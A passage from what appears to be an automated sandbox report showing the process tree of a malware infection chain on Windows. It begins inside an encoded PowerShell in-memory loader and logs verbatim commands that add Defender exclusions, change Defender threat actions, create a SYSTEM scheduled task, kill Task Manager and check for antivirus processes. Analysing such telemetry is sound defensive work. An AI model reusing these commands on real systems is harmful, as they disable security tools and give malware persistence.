GLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                                          5⤵
                                                          • UAC bypass
                                                          • Windows security bypass
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4216
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\the.exe" -Force
                                                            6⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5028
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                            6⤵
                                                              PID:2948
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                              6⤵
                                                              • Checks computer location settings
                                                              • Drops startup file
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2372
                                                              • C:\Users\Admin\Pictures\RCe3mlT8Wdkdb9aPrswnvIRb.exe
                                                                "C:\Users\Admin\Pictures\RCe3mlT8Wdkdb9aPrswnvIRb.exe" /s
                                                                7⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Writes to the Master Boot Record (MBR)
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                • Suspicious use of FindShellTrayWindow
                                                                • Suspicious use of SendNotifyMessage
                                                                PID:4796
                                                                • C:\Users\Admin\Pictures\360TS_Setup.exe
                                                                  "C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:5812
                                                                  • C:\Program Files (x86)\1716590799_0\360TS_Setup.exe
                                                                    "C:\Program Files (x86)\1716590799_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
                                                                    9⤵
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Writes to the Master Boot Record (MBR)
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:5480
                                                              • C:\Users\Admin\Pictures\RvxnXBkdfro8b00lTIFs8Efx.exe
                                                                "C:\Users\Admin\Pictures\RvxnXBkdfro8b00lTIFs8Efx.exe"
                                                                7⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                PID:3688
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k copy Deleted Deleted.cmd & Deleted.cmd & exit
                                                                  8⤵
                                                                    PID:5772
                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                      tasklist
                                                                      9⤵
                                                                      • Enumerates processes with tasklist
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3552
                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                      findstr /I "wrsa.exe opssvc.exe"
                                                                      9⤵
                                                                        PID:4620
                                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                                        tasklist
                                                                        9⤵
                                                                        • Enumerates processes with tasklist
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4072
                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                        9⤵
                                                                          PID:4196
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c md 726612
                                                                          9⤵
                                                                            PID:2148
                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                            findstr /V "BackedPanelTestimonialsPrivilege" Synthesis
                                                                            9⤵
                                                                              PID:4504
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c copy /b Linda + Catalogue 726612\M
                                                                              9⤵
                                                                                PID:1712
                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\726612\Autos.pif
                                                                                726612\Autos.pif 726612\M
                                                                                9⤵
                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:2336
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                ping -n 5 127.0.0.1
                                                                                9⤵
                                                                                • Runs ping.exe
                                                                                PID:5856
                                                                          • C:\Users\Admin\Pictures\XVQSMrZDAdFHiHkMnT3pMBK4.exe
                                                                            "C:\Users\Admin\Pictures\XVQSMrZDAdFHiHkMnT3pMBK4.exe"
                                                                            7⤵
                                                                            • Modifies firewall policy service
                                                                            • Windows security bypass
                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                            • Checks BIOS information in registry
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • Windows security modification
                                                                            • Checks whether UAC is enabled
                                                                            • Drops file in System32 directory
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:5588
                                                                            • C:\Users\Admin\Documents\SimpleAdobe\M3gvUklzYTfmlThJYuV9Dqi9.exe
                                                                              C:\Users\Admin\Documents\SimpleAdobe\M3gvUklzYTfmlThJYuV9Dqi9.exe
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Accesses Microsoft Outlook profiles
                                                                              • Checks processor information in registry
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • outlook_office_path
                                                                              • outlook_win_path
                                                                              PID:1016
                                                                          • C:\Users\Admin\Pictures\TUFPSDbmX4wv2pfj805IEop7.exe
                                                                            "C:\Users\Admin\Pictures\TUFPSDbmX4wv2pfj805IEop7.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:2288
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS9229.tmp\Install.exe
                                                                              .\Install.exe /odidum "385118" /S
                                                                              8⤵
                                                                              • Checks BIOS information in registry
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • Enumerates system info in registry
                                                                              PID:4100
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                9⤵
                                                                                  PID:4012
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                    10⤵
                                                                                      PID:4368
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                        11⤵
                                                                                          PID:4452
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                            12⤵
                                                                                              PID:2200
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                          10⤵
                                                                                            PID:5408
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                              11⤵
                                                                                                PID:4980
                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                  12⤵
                                                                                                    PID:5108
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                10⤵
                                                                                                  PID:2220
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                    11⤵
                                                                                                      PID:3596
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                        12⤵
                                                                                                          PID:4924
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                      10⤵
                                                                                                        PID:5792
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                          11⤵
                                                                                                            PID:3292
                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                              12⤵
                                                                                                                PID:5280
                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                            10⤵
                                                                                                              PID:4444
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                11⤵
                                                                                                                  PID:5232
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                    12⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1016
                                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                      13⤵
                                                                                                                        PID:1156
                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                9⤵
                                                                                                                  PID:1672
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                    10⤵
                                                                                                                      PID:5608
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                        11⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2536
                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                          12⤵
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5232
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:46:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS9229.tmp\Install.exe\" it /JcAdidoDXS 385118 /S" /V1 /F
                                                                                                                    9⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • Creates scheduled task(s)
                                                                                                                    PID:6068
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      10⤵
                                                                                                                        PID:2536
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                      9⤵
                                                                                                                        PID:4704
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                          10⤵
                                                                                                                            PID:1016
                                                                                                                            • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                              11⤵
                                                                                                                                PID:3224
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                                                      6⤵
                                                                                                                        PID:1792
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /f /im taskmgr.exe
                                                                                                                    4⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5772
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\wimloader.dll
                                                                                                                    wimloader.dll
                                                                                                                    4⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:1720
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_b15014a5-a992-4543-b250-c82c3f52334c\caller.cmd" "
                                                                                                                      5⤵
                                                                                                                        PID:936
                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\726612\Autos.pif
                                                                                                                  C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\726612\Autos.pif
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                  PID:3980
                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:2056
                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:5424
                                                                                                                  • C:\Windows\system32\efsui.exe
                                                                                                                    efsui.exe /efs /keybackup
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:5504
                                                                                                                  • C:\Windows\system32\AUDIODG.EXE
                                                                                                                    C:\Windows\system32\AUDIODG.EXE 0x414 0x41c
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:2600
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                                                                                                                    1⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5984
                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                      DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1ebe848a-415d-c14b-8a6a-d6a48d774229}\droidcamvideo.inf" "9" "41e7d49db" "0000000000000148" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\droidcam\lib"
                                                                                                                      2⤵
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:3000
                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                      DrvInst.exe "2" "211" "ROOT\MEDIA\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:c14ce8845b5e8bf3:DroidCamVideo.Device:21.4.1.0:droidcamvideo," "41e7d49db" "0000000000000154"
                                                                                                                      2⤵
                                                                                                                      • Registers COM server for autorun
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Modifies registry class
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:1620
                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                      DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{f1dbd8a9-7695-a744-b13e-baa988d54a07}\droidcam.inf" "9" "4e67c8bbf" "0000000000000160" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\droidcam\lib"
                                                                                                                      2⤵
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:2944
                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                      DrvInst.exe "2" "211" "ROOT\MEDIA\0001" "C:\Windows\INF\oem4.inf" "oem4.inf:ed86ca11f01d07d6:DroidCam_PCMEX:1.0.0.0:droidcam," "4e67c8bbf" "0000000000000154"
                                                                                                                      2⤵
                                                                                                                      • Drops file in Drivers directory
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4396
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2800 -ip 2800
                                                                                                                    1⤵
                                                                                                                      PID:2720
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                      1⤵
                                                                                                                        PID:1552
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                        1⤵
                                                                                                                          PID:4488
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS9229.tmp\Install.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zS9229.tmp\Install.exe it /JcAdidoDXS 385118 /S
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops desktop.ini file(s)
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:6076
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                            2⤵
                                                                                                                              PID:5720
                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                3⤵
                                                                                                                                  PID:5764
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                    4⤵
                                                                                                                                      PID:4612
                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                        5⤵
                                                                                                                                          PID:5280
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                      3⤵
                                                                                                                                        PID:5368
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                          4⤵
                                                                                                                                            PID:396
                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                              5⤵
                                                                                                                                                PID:3364
                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                            3⤵
                                                                                                                                              PID:6100
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                4⤵
                                                                                                                                                  PID:1128
                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                    5⤵
                                                                                                                                                      PID:5196
                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2632
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5660
                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5028
                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3932
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5620
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                5⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:2724
                                                                                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:5736
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
